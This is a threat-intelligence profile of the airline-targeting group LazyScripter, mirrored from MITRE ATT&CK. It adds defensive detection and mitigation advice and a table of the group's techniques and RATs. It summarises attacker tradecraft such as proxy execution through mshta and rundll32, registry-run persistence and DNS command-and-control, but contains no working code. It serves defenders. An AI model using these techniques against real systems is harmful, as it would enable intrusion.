G0140: LazyScripter
LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[1]
Analyst context for executives and security teams
LazyScripter matters because MITRE describes it as a group mainly targeting the airline industry and relying primarily on publicly available/open-source toolsets. For leaders, the decision value is not a unique malware signature; it is whether the organization can detect common post-exploitation frameworks, RATs, phishing-driven execution, script abuse, and command-and-control patterns that can blend into normal Windows and web/DNS traffic.
Executive priority
Prioritize this as a resilience and readiness test for aviation or airline-adjacent environments, and as a general control validation case for any enterprise with heavy Windows, email, scripting, and remote administration exposure. Executives should ask whether email security, endpoint telemetry, DNS/web monitoring, PowerShell/script logging, and incident response playbooks can handle commodity tools such as Koadic, QuasarRAT, Remcos, Empire, njRAT, ngrok, and KOCTOPUS without relying only on known indicators.
Technical view
ATT&CK relationships connect LazyScripter to phishing links and attachments, user execution, PowerShell, Windows Command Shell, Visual Basic, JavaScript/JScript, mshta, rundll32, registry run keys/startup folders, command obfuscation, masquerading, DNS and web-service C2, ingress tool transfer, and acquired domains. SOC and IR teams should validate detections across the full chain: suspicious email delivery, user-launched script or document activity, trusted Windows utility abuse, persistence creation, external tunnel/proxy or RAT traffic, and tool download events. Relationship context is strongly Windows-relevant through several tools and techniques, though the group object itself has no explicit platform field.
Likely telemetry
- Email security logs for spearphishing attachments and links
- Endpoint process creation and command-line telemetry for powershell.exe, cmd.exe, mshta.exe, rundll32.exe, Windows Script Host/JScript/VBScript activity, and suspicious child processes
- PowerShell logging where available, including script block/module/transcription-style evidence if enabled locally
- File creation and download telemetry for RATs, loaders, scripts, archives, and transferred tools
- Windows Registry and startup folder monitoring for Run key or startup persistence
Detection direction
- Do not center coverage only on LazyScripter-named indicators; the mapped behavior uses common tools and techniques that may appear in many intrusions or benign administration contexts.
- Tune detections for suspicious combinations: phishing-originated execution followed by script interpreters, mshta/rundll32 proxy execution, PowerShell or cmd spawning network connections, tool transfer, and persistence changes.
- Baseline legitimate administrative use of PowerShell, rundll32, mshta, ngrok or similar tunneling tools, and remote administration utilities to reduce false positives while preserving visibility into abnormal parent-child process chains and destinations.
- Correlate DNS/web anomalies with endpoint execution rather than treating network events in isolation, since DNS and web services are common and noisy.
- Validate that obfuscated command lines and masqueraded filenames are still captured and searchable; weak command-line logging is a major blind spot for this behavior set.
Mitigation priorities
- Strengthen phishing defenses and user-reporting workflows for malicious attachments and links, especially where airline or travel-sector business processes create high email dependency.
- Harden script execution paths: constrain unnecessary PowerShell, Windows Script Host, mshta, and rundll32 abuse where operationally feasible, and monitor exceptions.
- Apply least privilege and application control principles to reduce successful execution of unauthorized RATs, loaders, and post-exploitation frameworks.
- Monitor and restrict unauthorized tunneling, proxy, and remote access tools, including legitimate services that can be repurposed for C2 or exfiltration paths.
- Ensure persistence locations such as Registry Run keys and startup folders are monitored and reviewed during IR triage.
Analyst notes and limits
The strongest ATT&CK-supported business relevance is airline-sector targeting and use of publicly available toolsets. The relationship graph provides richer defensive direction than the group description itself: multiple RATs/frameworks, script interpreters, phishing, trusted Windows utility abuse, persistence, and C2 behaviors. This should be used as a coverage and hunt-planning profile rather than as a claim of current activity or customer exposure.
MITRE provides no official detection text, no explicit group-level platforms or tactics, and only one cited public report in the supplied references. Platforms and tactics in this take are inferred only from the supplied related techniques and software, not from the group object itself. Local telemetry, business process context, approved admin tooling, and current threat intelligence are required to determine actual exposure or detection coverage.
LazyScripter
LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.001 | Malicious Link Sub-technique | LazyScripter has relied upon users clicking on links to malicious files.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1218.005 | Mshta Sub-technique | LazyScripter has used `mshta.exe` to execute Koadic stagers.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1608.001 | Upload Malware Sub-technique | LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1204.002 | Malicious File Sub-technique | LazyScripter has lured users to open malicious email attachments.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1102 | Web Service | LazyScripter has used GitHub to host its payloads to operate spam campaigns.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.007 | JavaScript Sub-technique | LazyScripter has used JavaScript in its attacks.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1583.001 | Domains Sub-technique | LazyScripter has used dynamic DNS providers to create legitimate-looking subdomains for C2.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | LazyScripter has used VBScript to execute malicious code.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1071.004 | DNS Sub-technique | LazyScripter has leveraged dynamic DNS providers for C2 communications.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1588.001 | Malware Sub-technique | LazyScripter has used a variety of open-source remote access Trojans for its operations.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1105 | Ingress Tool Transfer | LazyScripter had downloaded additional tools to a compromised host.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1036 | Masquerading | LazyScripter has used several different security software icons to disguise executables.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | LazyScripter has used spam emails weaponized with archive or document files as its initial infection vector.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.001 | PowerShell Sub-technique | LazyScripter has used PowerShell scripts to execute malicious code.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | LazyScripter has used batch files to deploy open-source and multi-stage RATs.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | LazyScripter has leveraged the BatchEncryption tool to perform advanced batch script obfuscation and encoding techniques.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | LazyScripter has used `rundll32.exe` to execute Koadic stagers.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1583.006 | Web Services Sub-technique | LazyScripter has established GitHub accounts to host its toolsets.CitationMalwareBytes LazyScripter Feb 2021 |
Groups, software, and campaigns
S0332: Remcos
S0262: QuasarRAT
S0385: njRAT
S0508: ngrok
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
S0250: Koadic
S0669: KOCTOPUS
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 1c01e90978e2… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
MalwareBytes LazyScripter Feb 2021
Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
Open source URL -
[2]
LazyScripter
(Citation: MalwareBytes LazyScripter Feb 2021)
-
[3]
mitre-attack G0140Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.